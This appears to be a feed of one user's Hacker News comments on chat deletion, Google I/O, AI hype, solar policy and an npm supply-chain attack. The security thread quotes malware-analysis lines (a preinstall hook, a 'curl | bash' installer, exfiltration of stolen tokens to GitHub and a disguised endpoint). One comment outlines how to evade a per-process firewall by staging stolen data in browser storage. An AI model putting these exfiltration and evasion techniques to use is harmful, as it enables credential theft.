I set my chats to be automatically deleted in 24 hours. This way when we have a small argument with someone, there's less chance of someone being triggered/angered by re-reading the chat. Although there have been rare cases where I had big arguments and would've liked to have the receipts.
The only reason I default to 6 months is because 6 months appears to be the cut off after which the history is useless. It's occasionally saved my an arguement about what was agreed / said / planned. Otherwise I'd burn them after an hour.
But if storage isn't an issue, why go out of your way to remove them? Don't you think there is an underlying reason you are changing the default to remove them?
I don't go out my way, I just change the default. The underlying reason is it's useless data, why would I keep it? I don't transfer chats when I move phones either so...
I feel like you think there's something wrong with not collecting and keeping this data. I genuinely don't know why you would.
I do not think there is anything wrong with that (just that this is uncommon and surprising, so I'm curious), but in my hypothetical scenario where storage isn't an issue, having useless data stored should not matter.
Changing the default is not a big deal, for sure, but would you still do it if it required 10 minutes of your time every 6 months? If yes, I just cannot believe that you have no reason to do it. Perhaps it makes you feel freer, perhaps you think your device is more organized or cleaner, or something else.
But of course in real life data uses storage, but I feel like most people are on the other extreme and keep too much (data or possessions) because they cannot let go, but chat data footprint is usually minimal unless you receive lots of photos/videos.
I just not that way included. I don't like clutter. And were it a 10 minute process id never use the service at all. Maybe I'm odd, I don't use social media either, and only use a single chat app currently on my device. I regularly delete chats as well, not just alter the default retention period. I'm just really not interested in chat history at all. I view it as useless data once it's a week or so old.
You keep saying storage isnt an issue, but having a large digital footprint is just more baggage to manage in future. I want to let these conversations/relationships evolve and change over time, I dont want to keep revisiting them at a certain point.
Each time I get a new phone, I go through and curate the photos/ files worth saving, back them up offline, then start fresh.
Just because you can store everything, infinitely, forever, doesnt mean you need to.
Also it keeps asking you for execution permission all the time for the same commands over and over again (even if you add them to the settings).
Worse, I selected "Terminal Command Auto Execution: Proceed in Sandbox", and it keeps switching to "Always Proceed" (with a nice warning about how it is very dangerous). I have changed it 10 times then just gave up and switched to Codex.
They announced Gemini 3.5, an AI centered search approach, Gemini Spark, Gemini Omni, smart glasses, and more, and somehow that accounts to "having nothing to say"?
How high is the bar? Sure, most of this stuff is just improvement on existing things, and it's true that if you are not interested in AI then there wasn't something for you there, but are we expecting them to announce a revolutionary product each I/O conference?
No one is surprised that Google is putting AI in more places. Yes, the bar is high: announcing a new video generation tool or another personal agent doesn't sound amazing because both Google and its competitors already have that tech in some shape or form.
And smart glasses are something that every other company has been toying with for a long time. Google Glass, Meta Smart Glasses, Snapchat Spectacles, etc. Maybe they nail it this time around, but you've heard that announcement a dozen times before, so it's hard to go "OMG THIS IS BIG".
The HN thread about I/O racked up a grand total of 183 points. It never fares as well as WWDC on here, but that struck me as especially low. I think your list of things they announced is pretty telling - like, oh great, more bloody AI shit.
Google has terrible communication skills and aesthetic taste. Even if their new products are technically good, and you are interested in this space, it's almost impossible to follow, e.g.: https://x.com/nathanclark_/status/2056947354654355849?s=20
3.1 has 57M output tokens from Intelligence Index, 3.5 Flash has 73M, so not a lot more, and 3.5 is a bit cheaper, I don't get how 3.5 can be 74% more expensive.
The end goal of these companies is AGI, or even ASI. If you believe this is around the corner, and think AI can do the job of a human for less money, it makes sense to put all your money into working towards that goal and buying as much compute as you can. This is especially true since whoever gets there first (or is simply ahead and can use their AI to get even better) gets a big advantage.
That wouldn't help in that case as exfiltrated data is committed to public GitHub repositories. Unless you have to accept every time an app posts or requests data from known hosts?
Personally I don't allow outbound connections from almost any app, except web browsers to port 80/443. So nodejs, pip, ruby, curl, wget, etc, opening unexpected outbound connections is a big red flag for me.
In some cases, maybe you need to allow permanently git to open outbound resquests to github.com (or gitlab, etc), but at least in my case, I'm okey allowing these connections manually.
> preinstall script: bun run index.js
> Dual exfiltration:
> stolen data is committed as Git objects to public GitHub repositories (api.github.com)
> and sent as RSA+AES encrypted HTTPS POSTs to hxxps://t.m-kosche[.]com/api/public/otel/v1/traces (disguised as OpenTelemetry traces)
> The Bun installer command (command -v bun >/dev/null 2>&1 || (curl -fsSL https://bun.sh/install | bash && export PATH=$HOME/.bun/bin:$PATH)) prepends every injected hook to guarantee Bun availability
> A separate gh-token-monitor daemon (decrypted from J7, deployed by class so) installs to ~/.local/bin/gh-token-monitor.sh with its own systemd service and LaunchAgent. It polls stolen GitHub tokens at 60-second intervals with a 24-hour TTL
This attack in particular would have caused OpenSnitch to go crazy, giving you the opportunity to review what's going on.
1) write a well crafted exfil payload to mozilla or chrome directory (there are sqlite databases and files that store eg. indexeddb content)
2) trigger a tab open to attacker's website, website takes the exfil data from indexeddb and posts it to the server (have something inocuous looking on that website - like a fake npm homepage or whatever, so you don't close it fast enough)
from one step process, this will become universally usable two step process
be sure not to use extra cli parameters like "firefox --new-tab <url>", because if the rule is filtering by process path + cmdline it'll trigger a pop-up to allow the outbound request.
> Personally I don't allow outbound connections from almost any app, except web browsers to port 80/443. So nodejs, pip, ruby, curl, wget, etc, opening unexpected outbound connections is a big red flag for me.
Yep, exactly. Reject by default, with reasonably judicious always-allow rules.
> That wouldn't help in that case as exfiltrated data is committed to public GitHub repositories
Correct in general that it doesn't protect against stuff like that. But this whitelisting is done per-command (in this case, the whitelisting is scoped to the node executable). I've had no need to allow node access to Git in the first place, so no problem there.
> Unless you have to accept every time an app posts or requests data from known hosts?
OpenSnitch doesn't have access to application-level information, so it has no concept of "post" or "request." It's got DNS names, layer 3 info, layer 4 info, and other such things that are visible to the kernel. Your rules get matched to network traffic based on these various properties.
I just got a bit triggered by the "hype" word.
What if the hype was real? It is easy to say that nobody knows how all of this is going to work, and I would say it is a prudent thing to say, but there is value in making a bold prediction from the start instead of just updating your view to respond to change. In one case you are predicting stuff, in the other, just reacting.
But I absolutely agree that in hindsight we are often asking the wrong questions about each new technology.
I keep seeing on HN that AI is a hype, and many here are anti AI (which I get, as a programmer AI made my job less interesting, and I'm even worried about losing it), but where has AI underdelivered?
The hype is in what AI delivers (at least so far). I would never create a PR without an AI review. I will ask an AI to write code for me from time to time.
But it still has huge gaps in quality. And from time to time, it shows me that it doesn’t really understand things. You might point out that how is that any different from your mediocre engineer. But for most people skilled enough, you can easily know the difference when someone doesn’t really know something.
With AI, you discover this after reading several pages being dumped on you by people being “more productive” with AI.
Ok so the hype would be people saying AI can currently do something well and autonomously when it cannot (or not consistently enough), and it is easy to prove them wrong.
But I feel like people are more hyped about what the AI will be able to do soon rather than what it can do now.
I think AI does understand things (depending on your definition), how else could we communicate and ask it a question if it didn't? I mean we're quite far from Eliza here.
And yes, often their answer would be so wrong that we think it is impossible that AI understands anything, but this jagged intelligence doesn't prove, at least to me, that there isn't some understanding. At what point do we say that AI understands things? What if we can reduce 99% of those dumb failures, would we then say than AI understands?
That doesn't really respond to the question though - there is a quite reasonable argument that the Chinese room as a system 'understands' things.
The issue that is hit immediately is we don't have a definition or test of understanding that AI doesn't clear easily. Then on top of that we can't even really be sure that we ourselves are understand things given all the tricks that our minds play with memory and perception. There is precious little evidence that the people around us understand things, they seem to be guessing. It is completely unclear if a Chinese room has or doesn't have a property if we rule out all the tests that check for it as not really counting. But all the tests we can do suggest it does understand, because engineers can implement Chinese rooms now and they even turn out to be more reliably artistic/capable of novel thinking/creative than humans. Anything that tests understanding they can do.
No, they just say you are using the wrong model or something.
If it's a coworker dumping reviews of crap code on you at work, the incentive is to blanket approve everything because otherwise you're just the grumpy old man who is resisting innovation. No matter that the code makes no sense at all and the tests aren't actually testing what they should test.
Other than the stock market (which seems decoupled from reality at the moment), where has AI delivered?
The only use case where I see anything resembling AI delivering on it's promises is software, and my personal experience with that is that everything that comes out of the teams using AI is destructively broken. (Where they used to be able to deliver software that worked, even if it wasn't ideal, now they reliably make things worse and their stuff doesn't work when used.)
I agree, especially the juxtaposition of "we have still have no idea how all of this is going to work when the dust settles" and "hype". If we don't know, then there is a chance it isn't a hype.
For example, now it may seem that the models are becoming mere infrastructure, and the value moves up to apps and data. But if the models of tomorrow become able to write the apps themselves, then the value moves back. I won't need to pay some to write me a wrapper for the LLM, if the LLM will be able to write the same wrapper, maybe even better because it will be customized for my needs. The app providers are currently profiting from the gap between "what a software company can do using the AI" and "what the AI can do unaided", but that gap is going to shrink, possibly to zero.
How do you explain that solar got 50% less expensive in the last 10 years?
Why would people and institutions in control of solar equipment reprice their stuff to match the price of dirty electricity? You think there is no competition? Or you confuse it with the system that has been put in place where the price of electricity in the grid is set up by the most expensive producer at the time (which does make sense although you can argue against it).
Solar installation should pay for itself in less than 15 years in most cases, half the time according to that article: https://pv-magazine-usa.com/2024/10/03/average-u-s-residenti... (and residential solar is much less cost-effective than large-scale solar farms).
But can it pay itself in a month or two? That's the bar. I cannot financially plan for even one year later. Too many unknowns.
A really good coffee machine that can do lattes costs maybe $200. If lattes at coffee shops cost $8 including stupid high CA taxes and the stupid puppy face guilt tips, it pays for itself after ~35 lattes including supply costs, or just over a month. That's the bar for pretty much anything.
Figure out how to sell me $500 in solar panels that generates $500 worth of electricity over the next month and make it tax deductible with no income limits. That is how you cover the country in clean energy. FAST. Until politicians can get their act together, slam the hammer and make exactly this happen, we're going to be on dirty electricity for a long time.
That should especially be the bar for clean energy. Clean energy shouldn't be a luxury for the wealthy.
Well first of all TFA is not talking about individuals buying solar or anything, so do we at least agree that renewables make sense for countries/state?
It seems like you have set an impossible bar for renewables so I don't know what to say to you. I do not think you'll be able to put a mini nuclear station, gas or coal one in your garden for less than the monthly electricity fee, so it's unclear to me what you are comparing it to.
The problem with giving money to individuals for their rooftop solar is that rooftop solar is not cost effective compared to large scale solar, if you really care about the planet and money is limited you should maximise the bang for your buck and help solar farms instead.
But it's no secret that the current US administration is loudly anti-renewable and not keen on helping either of them.
I'm just saying what needs to happen in order for people to be lining up for solar in hordes and convert the country to renewable overnight.
The IRS needs to say: "We value clean energy in our country, we can live without nickel-and-diming people on the income used to make their solar purchase"
The Fed needs to say: "We value clean energy in our country, we can lend money to businesses at 0% interest, for the sake of supporting our country's clean future. Heck, -10% interest if you deploy today!"
The president needs to say: "We value clean energy in our country, we want solar as fast as possible, we will impose 0% tariffs on panels regardless of wherever they came from"
Wall Street needs to say: "We value clean energy in our country, it is saving the country from a multi-trillion dollar climate disaster, therefore we value solar companies at 100X their current valuations because that's what they are truly worth"
Solar companies need to say: "We aren't here to optimize profits; our only KPI is deploy solar as fast as possible"
The government needs to say to solar companies: "Do it! And don't worry if you're unprofitable, we value averting a 10 trillion climate crisis and will subsidize your losses from that 10 trillion loss that we averted"
Yeah, I know, it sounds impossible. Humans are shits, and they won't do the above. That's why the climate disaster is happening.
One thing that gets neglected by policymakers is that our top priority for energy policy should be resiliency. That means distributed systems with varied generation sources, without dependence on foreign suppliers.
This requires regulation unfortunately as it is inherently less efficient and cost optimized than the 1-2 solutions the market will coalesce around.
Solar + batteries are great but if the panels and cells all come from China we can’t base our energy future on that. We’d just be trading the Strait of Hormuz for the Taiwan Strait.
I know the USA can build forests of wind turbines that stretch from horizon to horizon. I’ve seen it in central Indiana. But can we do the same with solar cells and batteries?
Most batteries do not use rare earth metals.
Even if they did and it was an issue, we would find alternatives if that was necessary, just like rare earth free motors were developed to avoid all the downsides of that come with those.
Have a look at CATL’s sodium-ion batteries, they do not use anything expensive, rare, or particularly damaging to extract from the environment.
reply